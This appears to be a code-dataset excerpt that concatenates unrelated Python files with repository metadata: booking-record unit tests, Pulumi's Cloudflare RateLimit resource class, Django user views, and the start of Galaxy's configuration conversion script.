"rooms": "Number Of Rooms",
"creation": "Booking Creation Date",
"id": "Your Booking ID",
}
class TestStringMethods(unittest.TestCase):
def test_required(self):
rz = Rezchain(REQUIRED)
self.assertEqual(set(rz.types.keys()), set(REQUIRED.keys()))
def test_extra(self):
# Bad timestamp
m = REQUIRED.copy()
m["test"] = None
m["test_number"] = Number(null=True)
m["test_null"] = Number(null=True)
m["date_null"] = Date(null=True)
rz = Rezchain(m)
d = {
"reference": "id",
"amount": 1,
"currency": "CUR",
"status": "status",
"last_modified": "2021-01-01 00:00:00",
"test": 5,
"test_number": "7",
"test_null": "a",
"date_null": "z",
}
it = rz.add_item(d)
self.assertIsInstance(it["test"], str)
self.assertEqual(it["test"], "5")
def test_extra_error(self):
# Bad timestamp
m = REQUIRED.copy()
m["test_number"] = Number()
rz = Rezchain(m)
d = {
"reference": "id",
"amount": 1,
"currency": "CUR",
"status": "status",
"last_modified": "2021-01-01 00:00:00",
"test_number": "a",
}
self.assertRaises(ValueError, rz.add_item, d)
def test_required(self):
self.assertRaises(MapMissing, Rezchain, {"reference": "Common Reference ID"})
def test_bad_timestamp(self):
# Bad timestamp
rz = Rezchain(REQUIRED)
d = {
"reference": "id",
"amount": 1,
"currency": "CUR",
"status": "status",
"last_modified": "2021-01-01-bad",
}
self.assertRaises(ValueError, rz.add_item, d)
def test_bad_date(self):
# Bad timestamp
m = REQUIRED.copy()
m["creation"] = "Booking Creation Date"
rz = Rezchain(m)
d = {
"reference": "id",
"amount": 1,
"currency": "CUR",
"status": "status",
"last_modified": "2021-01-01 00:00:00",
"creation": "2021-01-234",
}
self.assertRaises(ValueError, rz.add_item, d)
def test_unmapped(self):
# Bad extra value
rz = Rezchain(REQUIRED)
it = {
"reference": "id",
"amount": 1,
"currency": "CUR",
"status": "status",
"last_modified": "2021-01-01 00:00:00",
"extra": "wrong"
}
it = rz.add_item(it)
self.assertFalse("extra" in it)
def test_csv(self):
rz = Rezchain({**REQUIRED, **OPTIONAL})
for i in range(100):
it = {
"reference": i,
"amount": i * 100,
"currency": f"CU{i}",
"status": "CONFIRMED",
"rooms": i,
}
if i % 2 == 0:
# test native times
it["last_modified"] = datetime.utcnow()
it["creation"] = date.today()
else:
# test iso times
it["last_modified"] = datetime.utcnow().isoformat()
it["creation"] = date.today().isoformat()
rz.add_item(it)
with tempfile.NamedTemporaryFile() as tmp:
tmp_size = rz.to_csv(tmp.name)
self.assertGreater(tmp_size, 0)
def test_azure(self):
rz = Rezchain({**REQUIRED, **OPTIONAL})
for i in range(100):
it = {
"reference": i,
"amount": i * 100,
"currency": f"CU{i}",
"status": "CONFIRMED",
"rooms": i,
}
if i % 2 == 0:
# test native times
it["last_modified"] = datetime.utcnow()
it["creation"] = date.today()
else:
# test iso times
it["last_modified"] = datetime.utcnow().isoformat()
it["creation"] = date.today().isoformat()
rz.add_item(it)
with tempfile.NamedTemporaryFile() as tmp:
tmp_size = rz.to_csv(tmp.name)
azure_size = rz.to_azure("", "", "", test=True)
self.assertAlmostEqual(tmp_size, azure_size)
if __name__ == '__main__':
unittest.main()
| 29.768293 | 85 | 0.491602 |
4a225173dc61db3e7e2bc7ccebd039d4c61c1126 | 31,130 | py | Python | sdk/python/pulumi_cloudflare/rate_limit.py | pulumi/pulumi-cloudflare | d444af2fab6101b388a15cf2e3933e45e9935cc6 | [
"ECL-2.0",
"Apache-2.0"
] | 35 | 2019-03-14T21:29:29.000Z | 2022-03-30T00:00:59.000Z | sdk/python/pulumi_cloudflare/rate_limit.py | pulumi/pulumi-cloudflare | d444af2fab6101b388a15cf2e3933e45e9935cc6 | [
"ECL-2.0",
"Apache-2.0"
] | 128 | 2019-03-08T23:45:58.000Z | 2022-03-31T21:05:22.000Z | sdk/python/pulumi_cloudflare/rate_limit.py | pulumi/pulumi-cloudflare | d444af2fab6101b388a15cf2e3933e45e9935cc6 | [
"ECL-2.0",
"Apache-2.0"
] | 6 | 2019-05-10T12:52:56.000Z | 2020-03-24T15:02:14.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RateLimitArgs', 'RateLimit']
@pulumi.input_type
class RateLimitArgs:
def __init__(__self__, *,
action: pulumi.Input['RateLimitActionArgs'],
period: pulumi.Input[int],
threshold: pulumi.Input[int],
zone_id: pulumi.Input[str],
bypass_url_patterns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
correlate: Optional[pulumi.Input['RateLimitCorrelateArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input['RateLimitMatchArgs']] = None):
"""
The set of arguments for constructing a RateLimit resource.
:param pulumi.Input['RateLimitActionArgs'] action: The action to be performed when the threshold of matched traffic within the period defined is exceeded.
:param pulumi.Input[int] period: The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
:param pulumi.Input[int] threshold: The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
:param pulumi.Input[str] zone_id: The DNS zone ID to apply rate limiting to.
:param pulumi.Input[Sequence[pulumi.Input[str]]] bypass_url_patterns: URLs matching the patterns specified here will be excluded from rate limiting.
:param pulumi.Input['RateLimitCorrelateArgs'] correlate: Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
:param pulumi.Input[str] description: A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
:param pulumi.Input[bool] disabled: Whether this ratelimit is currently disabled. Default: `false`.
:param pulumi.Input['RateLimitMatchArgs'] match: Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
"""
pulumi.set(__self__, "action", action)
pulumi.set(__self__, "period", period)
pulumi.set(__self__, "threshold", threshold)
pulumi.set(__self__, "zone_id", zone_id)
if bypass_url_patterns is not None:
pulumi.set(__self__, "bypass_url_patterns", bypass_url_patterns)
if correlate is not None:
pulumi.set(__self__, "correlate", correlate)
if description is not None:
pulumi.set(__self__, "description", description)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if match is not None:
pulumi.set(__self__, "match", match)
@property
@pulumi.getter
def action(self) -> pulumi.Input['RateLimitActionArgs']:
"""
The action to be performed when the threshold of matched traffic within the period defined is exceeded.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: pulumi.Input['RateLimitActionArgs']):
pulumi.set(self, "action", value)
@property
@pulumi.getter
def period(self) -> pulumi.Input[int]:
"""
The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: pulumi.Input[int]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def threshold(self) -> pulumi.Input[int]:
"""
The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: pulumi.Input[int]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter(name="zoneId")
def zone_id(self) -> pulumi.Input[str]:
"""
The DNS zone ID to apply rate limiting to.
"""
return pulumi.get(self, "zone_id")
@zone_id.setter
def zone_id(self, value: pulumi.Input[str]):
pulumi.set(self, "zone_id", value)
@property
@pulumi.getter(name="bypassUrlPatterns")
def bypass_url_patterns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
URLs matching the patterns specified here will be excluded from rate limiting.
"""
return pulumi.get(self, "bypass_url_patterns")
@bypass_url_patterns.setter
def bypass_url_patterns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "bypass_url_patterns", value)
@property
@pulumi.getter
def correlate(self) -> Optional[pulumi.Input['RateLimitCorrelateArgs']]:
"""
Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
"""
return pulumi.get(self, "correlate")
@correlate.setter
def correlate(self, value: Optional[pulumi.Input['RateLimitCorrelateArgs']]):
pulumi.set(self, "correlate", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this ratelimit is currently disabled. Default: `false`.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def match(self) -> Optional[pulumi.Input['RateLimitMatchArgs']]:
"""
Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
"""
return pulumi.get(self, "match")
@match.setter
def match(self, value: Optional[pulumi.Input['RateLimitMatchArgs']]):
pulumi.set(self, "match", value)
@pulumi.input_type
class _RateLimitState:
def __init__(__self__, *,
action: Optional[pulumi.Input['RateLimitActionArgs']] = None,
bypass_url_patterns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
correlate: Optional[pulumi.Input['RateLimitCorrelateArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input['RateLimitMatchArgs']] = None,
period: Optional[pulumi.Input[int]] = None,
threshold: Optional[pulumi.Input[int]] = None,
zone_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering RateLimit resources.
:param pulumi.Input['RateLimitActionArgs'] action: The action to be performed when the threshold of matched traffic within the period defined is exceeded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] bypass_url_patterns: URLs matching the patterns specified here will be excluded from rate limiting.
:param pulumi.Input['RateLimitCorrelateArgs'] correlate: Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
:param pulumi.Input[str] description: A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
:param pulumi.Input[bool] disabled: Whether this ratelimit is currently disabled. Default: `false`.
:param pulumi.Input['RateLimitMatchArgs'] match: Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
:param pulumi.Input[int] period: The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
:param pulumi.Input[int] threshold: The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
:param pulumi.Input[str] zone_id: The DNS zone ID to apply rate limiting to.
"""
if action is not None:
pulumi.set(__self__, "action", action)
if bypass_url_patterns is not None:
pulumi.set(__self__, "bypass_url_patterns", bypass_url_patterns)
if correlate is not None:
pulumi.set(__self__, "correlate", correlate)
if description is not None:
pulumi.set(__self__, "description", description)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if match is not None:
pulumi.set(__self__, "match", match)
if period is not None:
pulumi.set(__self__, "period", period)
if threshold is not None:
pulumi.set(__self__, "threshold", threshold)
if zone_id is not None:
pulumi.set(__self__, "zone_id", zone_id)
@property
@pulumi.getter
def action(self) -> Optional[pulumi.Input['RateLimitActionArgs']]:
"""
The action to be performed when the threshold of matched traffic within the period defined is exceeded.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: Optional[pulumi.Input['RateLimitActionArgs']]):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="bypassUrlPatterns")
def bypass_url_patterns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
URLs matching the patterns specified here will be excluded from rate limiting.
"""
return pulumi.get(self, "bypass_url_patterns")
@bypass_url_patterns.setter
def bypass_url_patterns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "bypass_url_patterns", value)
@property
@pulumi.getter
def correlate(self) -> Optional[pulumi.Input['RateLimitCorrelateArgs']]:
"""
Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
"""
return pulumi.get(self, "correlate")
@correlate.setter
def correlate(self, value: Optional[pulumi.Input['RateLimitCorrelateArgs']]):
pulumi.set(self, "correlate", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this ratelimit is currently disabled. Default: `false`.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def match(self) -> Optional[pulumi.Input['RateLimitMatchArgs']]:
"""
Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
"""
return pulumi.get(self, "match")
@match.setter
def match(self, value: Optional[pulumi.Input['RateLimitMatchArgs']]):
pulumi.set(self, "match", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def threshold(self) -> Optional[pulumi.Input[int]]:
"""
The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter(name="zoneId")
def zone_id(self) -> Optional[pulumi.Input[str]]:
"""
The DNS zone ID to apply rate limiting to.
"""
return pulumi.get(self, "zone_id")
@zone_id.setter
def zone_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone_id", value)
class RateLimit(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['RateLimitActionArgs']]] = None,
bypass_url_patterns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
correlate: Optional[pulumi.Input[pulumi.InputType['RateLimitCorrelateArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input[pulumi.InputType['RateLimitMatchArgs']]] = None,
period: Optional[pulumi.Input[int]] = None,
threshold: Optional[pulumi.Input[int]] = None,
zone_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Cloudflare rate limit resource for a given zone. This can be used to limit the traffic you receive zone-wide, or matching more specific types of requests/responses.
## Example Usage
```python
import pulumi
import pulumi_cloudflare as cloudflare
example = cloudflare.RateLimit("example",
zone_id=var["cloudflare_zone_id"],
threshold=2000,
period=2,
match=cloudflare.RateLimitMatchArgs(
request=cloudflare.RateLimitMatchRequestArgs(
url_pattern=f"{var['cloudflare_zone']}/*",
schemes=[
"HTTP",
"HTTPS",
],
methods=[
"GET",
"POST",
"PUT",
"DELETE",
"PATCH",
"HEAD",
],
),
response=cloudflare.RateLimitMatchResponseArgs(
statuses=[
200,
201,
202,
301,
429,
],
origin_traffic=False,
headers=[
{
"name": "Host",
"op": "eq",
"value": "localhost",
},
{
"name": "X-Example",
"op": "ne",
"value": "my-example",
},
],
),
),
action=cloudflare.RateLimitActionArgs(
mode="simulate",
timeout=43200,
response=cloudflare.RateLimitActionResponseArgs(
content_type="text/plain",
body="custom response body",
),
),
correlate=cloudflare.RateLimitCorrelateArgs(
by="nat",
),
disabled=False,
description="example rate limit for a zone",
bypass_url_patterns=[
f"{var['cloudflare_zone']}/bypass1",
f"{var['cloudflare_zone']}/bypass2",
])
```
## Import
Rate limits can be imported using a composite ID formed of zone name and rate limit ID, e.g.
```sh
$ pulumi import cloudflare:index/rateLimit:RateLimit default d41d8cd98f00b204e9800998ecf8427e/ch8374ftwdghsif43
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['RateLimitActionArgs']] action: The action to be performed when the threshold of matched traffic within the period defined is exceeded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] bypass_url_patterns: URLs matching the patterns specified here will be excluded from rate limiting.
:param pulumi.Input[pulumi.InputType['RateLimitCorrelateArgs']] correlate: Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
:param pulumi.Input[str] description: A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
:param pulumi.Input[bool] disabled: Whether this ratelimit is currently disabled. Default: `false`.
:param pulumi.Input[pulumi.InputType['RateLimitMatchArgs']] match: Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
:param pulumi.Input[int] period: The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
:param pulumi.Input[int] threshold: The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
:param pulumi.Input[str] zone_id: The DNS zone ID to apply rate limiting to.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RateLimitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Cloudflare rate limit resource for a given zone. This can be used to limit the traffic you receive zone-wide, or matching more specific types of requests/responses.
## Example Usage
```python
import pulumi
import pulumi_cloudflare as cloudflare
example = cloudflare.RateLimit("example",
zone_id=var["cloudflare_zone_id"],
threshold=2000,
period=2,
match=cloudflare.RateLimitMatchArgs(
request=cloudflare.RateLimitMatchRequestArgs(
url_pattern=f"{var['cloudflare_zone']}/*",
schemes=[
"HTTP",
"HTTPS",
],
methods=[
"GET",
"POST",
"PUT",
"DELETE",
"PATCH",
"HEAD",
],
),
response=cloudflare.RateLimitMatchResponseArgs(
statuses=[
200,
201,
202,
301,
429,
],
origin_traffic=False,
headers=[
{
"name": "Host",
"op": "eq",
"value": "localhost",
},
{
"name": "X-Example",
"op": "ne",
"value": "my-example",
},
],
),
),
action=cloudflare.RateLimitActionArgs(
mode="simulate",
timeout=43200,
response=cloudflare.RateLimitActionResponseArgs(
content_type="text/plain",
body="custom response body",
),
),
correlate=cloudflare.RateLimitCorrelateArgs(
by="nat",
),
disabled=False,
description="example rate limit for a zone",
bypass_url_patterns=[
f"{var['cloudflare_zone']}/bypass1",
f"{var['cloudflare_zone']}/bypass2",
])
```
## Import
Rate limits can be imported using a composite ID formed of zone name and rate limit ID, e.g.
```sh
$ pulumi import cloudflare:index/rateLimit:RateLimit default d41d8cd98f00b204e9800998ecf8427e/ch8374ftwdghsif43
```
:param str resource_name: The name of the resource.
:param RateLimitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RateLimitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['RateLimitActionArgs']]] = None,
bypass_url_patterns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
correlate: Optional[pulumi.Input[pulumi.InputType['RateLimitCorrelateArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input[pulumi.InputType['RateLimitMatchArgs']]] = None,
period: Optional[pulumi.Input[int]] = None,
threshold: Optional[pulumi.Input[int]] = None,
zone_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RateLimitArgs.__new__(RateLimitArgs)
if action is None and not opts.urn:
raise TypeError("Missing required property 'action'")
__props__.__dict__["action"] = action
__props__.__dict__["bypass_url_patterns"] = bypass_url_patterns
__props__.__dict__["correlate"] = correlate
__props__.__dict__["description"] = description
__props__.__dict__["disabled"] = disabled
__props__.__dict__["match"] = match
if period is None and not opts.urn:
raise TypeError("Missing required property 'period'")
__props__.__dict__["period"] = period
if threshold is None and not opts.urn:
raise TypeError("Missing required property 'threshold'")
__props__.__dict__["threshold"] = threshold
if zone_id is None and not opts.urn:
raise TypeError("Missing required property 'zone_id'")
__props__.__dict__["zone_id"] = zone_id
super(RateLimit, __self__).__init__(
'cloudflare:index/rateLimit:RateLimit',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['RateLimitActionArgs']]] = None,
bypass_url_patterns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
correlate: Optional[pulumi.Input[pulumi.InputType['RateLimitCorrelateArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input[pulumi.InputType['RateLimitMatchArgs']]] = None,
period: Optional[pulumi.Input[int]] = None,
threshold: Optional[pulumi.Input[int]] = None,
zone_id: Optional[pulumi.Input[str]] = None) -> 'RateLimit':
"""
Get an existing RateLimit resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['RateLimitActionArgs']] action: The action to be performed when the threshold of matched traffic within the period defined is exceeded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] bypass_url_patterns: URLs matching the patterns specified here will be excluded from rate limiting.
:param pulumi.Input[pulumi.InputType['RateLimitCorrelateArgs']] correlate: Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
:param pulumi.Input[str] description: A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
:param pulumi.Input[bool] disabled: Whether this ratelimit is currently disabled. Default: `false`.
:param pulumi.Input[pulumi.InputType['RateLimitMatchArgs']] match: Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
:param pulumi.Input[int] period: The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
:param pulumi.Input[int] threshold: The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
:param pulumi.Input[str] zone_id: The DNS zone ID to apply rate limiting to.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RateLimitState.__new__(_RateLimitState)
__props__.__dict__["action"] = action
__props__.__dict__["bypass_url_patterns"] = bypass_url_patterns
__props__.__dict__["correlate"] = correlate
__props__.__dict__["description"] = description
__props__.__dict__["disabled"] = disabled
__props__.__dict__["match"] = match
__props__.__dict__["period"] = period
__props__.__dict__["threshold"] = threshold
__props__.__dict__["zone_id"] = zone_id
return RateLimit(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def action(self) -> pulumi.Output['outputs.RateLimitAction']:
"""
The action to be performed when the threshold of matched traffic within the period defined is exceeded.
"""
return pulumi.get(self, "action")
@property
@pulumi.getter(name="bypassUrlPatterns")
def bypass_url_patterns(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
URLs matching the patterns specified here will be excluded from rate limiting.
"""
return pulumi.get(self, "bypass_url_patterns")
@property
@pulumi.getter
def correlate(self) -> pulumi.Output[Optional['outputs.RateLimitCorrelate']]:
"""
Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
"""
return pulumi.get(self, "correlate")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def disabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether this ratelimit is currently disabled. Default: `false`.
"""
return pulumi.get(self, "disabled")
@property
@pulumi.getter
def match(self) -> pulumi.Output['outputs.RateLimitMatch']:
"""
Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
"""
return pulumi.get(self, "match")
@property
@pulumi.getter
def period(self) -> pulumi.Output[int]:
"""
The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
"""
return pulumi.get(self, "period")
@property
@pulumi.getter
def threshold(self) -> pulumi.Output[int]:
"""
The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
"""
return pulumi.get(self, "threshold")
@property
@pulumi.getter(name="zoneId")
def zone_id(self) -> pulumi.Output[str]:
"""
The DNS zone ID to apply rate limiting to.
"""
return pulumi.get(self, "zone_id")
| 45.645161 | 210 | 0.615291 |
4a225188ac14f1aaa3308ff887b40de15c1d1978 | 1,474 | py | Python | wiki_allatra_club/users/views.py | skhalymon/wiki-and-reader | 9a585170a0d62641a6d71b0696a777e12c7d0546 | [
"BSD-3-Clause"
] | null | null | null | wiki_allatra_club/users/views.py | skhalymon/wiki-and-reader | 9a585170a0d62641a6d71b0696a777e12c7d0546 | [
"BSD-3-Clause"
] | null | null | null | wiki_allatra_club/users/views.py | skhalymon/wiki-and-reader | 9a585170a0d62641a6d71b0696a777e12c7d0546 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.core.urlresolvers import reverse
from django.views.generic import DetailView, ListView, RedirectView, UpdateView
from braces.views import LoginRequiredMixin
from .forms import UserForm
from .models import User
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username"
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail",
kwargs={"username": self.request.user.username})
class UserUpdateView(LoginRequiredMixin, UpdateView):
form_class = UserForm
# we already imported User in the view code above, remember?
model = User
# send the user back to their own page after a successful update
def get_success_url(self):
return reverse("users:detail",
kwargs={"username": self.request.user.username})
def get_object(self):
# Only get the User record for the user making the request
return User.objects.get(username=self.request.user.username)
class UserListView(LoginRequiredMixin, ListView):
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username" | 30.081633 | 79 | 0.719132 |
4a2251e44295aae19eca24e92d5d6bf7ac80602f | 30,917 | py | Python | lib/galaxy/config/config_manage.py | NordicESMhub/galaxy | ec3ffb7d8ec5dac9b179f4c9d39b8060b69d5492 | [
"CC-BY-3.0"
] | 1 | 2021-02-27T19:54:49.000Z | 2021-02-27T19:54:49.000Z | lib/galaxy/config/config_manage.py | NordicESMhub/galaxy | ec3ffb7d8ec5dac9b179f4c9d39b8060b69d5492 | [
"CC-BY-3.0"
] | 78 | 2019-01-18T08:12:49.000Z | 2022-03-13T08:56:41.000Z | lib/galaxy/config/config_manage.py | NordicESMhub/galaxy | ec3ffb7d8ec5dac9b179f4c9d39b8060b69d5492 | [
"CC-BY-3.0"
] | 9 | 2019-01-18T07:49:12.000Z | 2021-06-26T22:21:09.000Z | import argparse
import os
import shutil
import string
import sys
import tempfile
from io import StringIO
from textwrap import TextWrapper
from typing import Any, List, NamedTuple
import requests
import yaml
from boltons.iterutils import remap
try:
from pykwalify.core import Core
except ImportError:
Core = None
if __name__ == '__main__':
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)))
from galaxy.config import GALAXY_CONFIG_SCHEMA_PATH
from galaxy.config.schema import (
AppSchema,
OPTION_DEFAULTS,
Schema,
)
from galaxy.util import safe_makedirs
from galaxy.util.properties import nice_config_parser
from galaxy.util.yaml_util import (
ordered_dump,
ordered_load,
)
DESCRIPTION = "Convert configuration files."
APP_DESCRIPTION = """Application to target for operation (i.e. galaxy, tool_shed, or reports))"""
DRY_RUN_DESCRIPTION = """If this action modifies files, just print what would be the result and continue."""
UNKNOWN_OPTION_MESSAGE = "Option [%s] not found in schema - either it is invalid or the Galaxy team hasn't documented it. If invalid, you should manually remove it. If the option is valid but undocumented, please file an issue with the Galaxy team."
USING_SAMPLE_MESSAGE = "Path [%s] not a file, using sample."
EXTRA_SERVER_MESSAGE = "Additional server section after [%s] encountered [%s], will be ignored."
MISSING_FILTER_TYPE_MESSAGE = "Missing filter type for section [%s], it will be ignored."
UNHANDLED_FILTER_TYPE_MESSAGE = "Unhandled filter type encountered [%s] for section [%s]."
NO_APP_MAIN_MESSAGE = "No app:main section found, using application defaults throughout."
YAML_COMMENT_WRAPPER = TextWrapper(initial_indent="# ", subsequent_indent="# ", break_long_words=False, break_on_hyphens=False)
RST_DESCRIPTION_WRAPPER = TextWrapper(initial_indent=" ", subsequent_indent=" ", break_long_words=False, break_on_hyphens=False)
UWSGI_SCHEMA_PATH = "lib/galaxy/webapps/uwsgi_schema.yml"
UWSGI_OPTIONS = dict([
('http', {
'desc': """The address and port on which to listen. By default, only listen to localhost ($app_name will not be accessible over the network). Use ':$default_port' to listen on all available network interfaces.""",
'default': '127.0.0.1:$default_port',
'type': 'str',
}),
('buffer-size', {
'desc': """By default uWSGI allocates a very small buffer (4096 bytes) for the headers of each request. If you start receiving "invalid request block size" in your logs, it could mean you need a bigger buffer. We recommend at least 16384.""",
'default': 16384,
'type': 'int',
